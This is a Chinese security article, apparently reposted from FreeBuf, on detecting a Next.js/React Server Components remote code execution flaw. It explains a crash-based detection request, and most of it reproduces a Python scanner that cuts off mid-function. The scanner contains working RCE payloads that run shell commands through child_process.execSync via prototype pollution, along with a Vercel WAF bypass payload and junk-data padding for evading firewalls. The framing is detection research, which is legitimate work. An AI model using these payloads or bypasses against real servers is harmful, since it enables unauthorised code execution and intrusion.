穿透waf跨平台实现Next.js RCE漏洞精准扫描
文章介绍了一种检测Next.js应用中远程代码执行(RCE)漏洞的方法。通过发送特定的HTTP POST请求,可以触发存在漏洞的应用返回500错误并包含特定JSON内容。该方法利用React Server Components处理对象属性时的冒号分隔符特性,在未修复版本中导致异常,而修复版本则新增校验以防止崩溃。 2025-12-17 01:42:5 Author: www.freebuf.com(查看原文) 阅读量:0 收藏

下面的方法将力求提供一种既安全又高可信的HTTP请求, 用于确认Next.js应用中是否存在该RCE漏洞。 以下HTTP请求可用于确认该漏洞是否存在:

POST / HTTP/1.1Host: hostnameUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0Next-Action: xX-Nextjs-Request-Id: b5dce965Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5DContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3SadX-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9Content-Length: 232  
------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"  
{}------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"  
["$1:a:a"]------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

当向存在漏洞的Next.js版本发送上述请求时,其 HTTP 响应将类似如下:

HTTP/1.1 500 Internal Server ErrorDate: Thu, 04 Dec 2025 06:16:39 GMTContent-Type: text/x-componentConnection: keep-aliveCache-Control: no-store, must-revalidate, no-cache, max-age=0Vary: rscContent-Length: 76  
0:{"a":"$@1","f":"","b":"yd-J8UfWl70zwtaAy83s7"}1:E{"digest":"2971658870"}

通过检查是否返回 包含 E{"digest" 的内容并且 HTTP 状态码为 500,可以在你的环境中可靠地识别出存在漏洞的主机。

该检测之所以能够区分易受攻击与不易受攻击的主机,是因为React Server 依赖在处理对象属性时,使用冒号(:)作为分隔符。参考下面的代码片段:

function getOutlinedModel<T>(  response: Response,  reference: string,  parentObject: Object,  key: string,  map: (response: Response, model: any, parentObject: Object, key: string) => T,): T {  const path = reference.split(':');// ... snip ...  for (let i = 1; i < path.length; i++) {    value = value[path[i]];  }

例如,如果在 multipart 请求中传入如下 JSON:

------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"  
["$1:a:b"]------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"  
{"a":{"b":"foo"}}------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

它会被转换为如下形式:

"$1:a:b" -> {"a":{"b":"foo"}}.a.b -> "foo"

在存在漏洞的 React Server 版本中,可以通过以下 multipart 请求强制触发一个 500 错误:

------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="0"  
["$1:a:a"]------WebKitFormBoundaryx8jO2oVc6SWP3SadContent-Disposition: form-data; name="1"  
{}------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

之所以会抛出异常,是因为最终它会映射为如下结构:

"$1:a:a" -> {}.a.a -> (undefined).a -> 500

在已修复的 React Server Components 版本中,针对这种冒号语法新增了一层校验,从而防止程序发生崩溃:

 const name = path[i];    if (typeof value === 'object' && hasOwnProperty.call(value, name)) {      value = value[name];    }

这意味着,如果 : 语法引用了一个不存在的属性,该引用会被忽略。因此,在补丁修复后,将不再返回 500 错误。

按照以上思路编写的检测程序如下:

#!/usr/bin/env python3# /// script# requires-python = ">=3.9"# dependencies = [#     "requests>=2.28.0",#     "tqdm>=4.64.0",# ]# ///"""React2Shell Scanner - High Fidelity Detection for RSC/Next.js RCECVE-2025-55182 & CVE-2025-66478  
Based on research from Assetnote Security Research Team."""  
import argparseimport sysimport jsonimport osimport randomimport reimport stringfrom datetime import datetime, timezonefrom concurrent.futures import ThreadPoolExecutor, as_completedfrom urllib.parse import urlparsefrom typing import Optional, Tuple  
try:    import requests    from requests.exceptions import RequestExceptionexcept ImportError:    print("Error: 'requests' library required. Install with: pip install requests")    sys.exit(1)  
try:    from tqdm import tqdmexcept ImportError:    print("Error: 'tqdm' library required. Install with: pip install tqdm")    sys.exit(1)  
  
class Colors:    RED = "\033[91m"    GREEN = "\033[92m"    YELLOW = "\033[93m"    BLUE = "\033[94m"    MAGENTA = "\033[95m"    CYAN = "\033[96m"    WHITE = "\033[97m"    BOLD = "\033[1m"    RESET = "\033[0m"  
  
def colorize(text: str, color: str) -> str:    """Apply color to text."""    return f"{color}{text}{Colors.RESET}"  
  
def print_banner():    """Print the tool banner."""    banner = f"""{Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET}"""    print(banner)  
  
def parse_headers(header_list: Optional[list[str]]) -> dict[str, str]:    """Parse a list of 'Key: Value' strings into a dict."""    headers = {}    if not header_list:        return headers    for header in header_list:        if ": " in header:            key, value = header.split(": ", 1)            headers[key] = value        elif ":" in header:            key, value = header.split(":", 1)            headers[key] = value.lstrip()    return headers  
  
def normalize_host(host: str) -> str:    """Normalize host to include scheme if missing."""    host = host.strip()    if not host:        return ""    if not host.startswith(("http://", "https://")):        host = f"https://{host}"    return host.rstrip("/")  
  
def generate_junk_data(size_bytes: int) -> tuple[str, str]:    """Generate random junk data for WAF bypass."""    param_name = ''.join(random.choices(string.ascii_lowercase, k=12))    junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes))    return param_name, junk  
  
def build_safe_payload() -> tuple[str, str]:    """Build the safe multipart form data payload for the vulnerability check (side-channel)."""    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"  
    body = (        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="1"\r\n\r\n'        f"{{}}\r\n"        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="0"\r\n\r\n'        f'["$1:aa:aa"]\r\n'        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"    )  
    content_type = f"multipart/form-data; boundary={boundary}"    return body, content_type  
  
def build_vercel_waf_bypass_payload() -> tuple[str, str]:    """Build the Vercel WAF bypass multipart form data payload."""    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"  
    part0 = (        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'        '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":'        '"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;'        'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",'        '"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}'    )  
    body = (        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="0"\r\n\r\n'        f"{part0}\r\n"        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="1"\r\n\r\n'        f'"$@0"\r\n'        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="2"\r\n\r\n'        f"[]\r\n"        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="3"\r\n\r\n'        f'{{"\\"\u0024\u0024":{{}}}}\r\n'        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"    )  
    content_type = f"multipart/form-data; boundary={boundary}"    return body, content_type  
  
def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]:    """Build the RCE PoC multipart form data payload."""    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"  
    if windows:        # PowerShell payload - escape double quotes for JSON        cmd = 'powershell -c \\\"41*271\\\"'    else:        # Linux/Unix payload        cmd = 'echo $((41*271))'  
    prefix_payload = (        f"var res=process.mainModule.require('child_process').execSync('{cmd}')"        f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),"        f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"    )  
    part0 = (        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'        '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"'        + prefix_payload        + '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'    )  
    parts = []  
    # Add junk data at the start if WAF bypass is enabled    if waf_bypass:        param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024)        parts.append(            f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"            f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n'            f"{junk}\r\n"        )  
    parts.append(        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="0"\r\n\r\n'        f"{part0}\r\n"    )    parts.append(        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="1"\r\n\r\n'        f'"$@0"\r\n'    )    parts.append(        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"        f'Content-Disposition: form-data; name="2"\r\n\r\n'        f"[]\r\n"    )    parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")  
    body = "".join(parts)    content_type = f"multipart/form-data; boundary={boundary}"    return body, content_type  
  
def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str:    """Follow redirects only if they stay on the same host."""    current_url = url    original_host = urlparse(url).netloc  
    for _ in range(max_redirects):        try:            response = requests.head(                current_url,                timeout=timeout,                verify=verify_ssl,                allow_redirects=False            )            if response.status_code in (301, 302, 303, 307, 308):                location = response.headers.get("Location")                if location:                    if location.startswith("/"):                        # Relative redirect - same host, safe to follow                        parsed = urlparse(current_url)                        current_url = f"{parsed.scheme}://{parsed.netloc}{location}"                    else:                        # Absolute redirect - check if same host                        new_host = urlparse(location).netloc                        if new_host == original_host:                            current_url = location                        else:                            break  # Different host, stop following                else:                    break            else:                break        except RequestException:            break    return current_url  
  
def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> Tuple[Optional[requests.Response], Optional[str]]:    """Send the exploit payload to a URL. Returns (response, error)."""    try:        # Encode body as bytes to ensure proper Content-Length calculation        # and avoid potential encoding issues with the HTTP client        body_bytes = body.encode('utf-8') if isinstance(body, str) else body        response = requests.post(            target_url,            headers=headers,            data=body_bytes,            timeout=timeout,            verify=verify_ssl,            allow_redirects=False        )        return response, None    except requests.exceptions.SSLE

文章来源: https://www.freebuf.com/articles/web/462493.html
如有侵权请联系:admin#unsafe.sh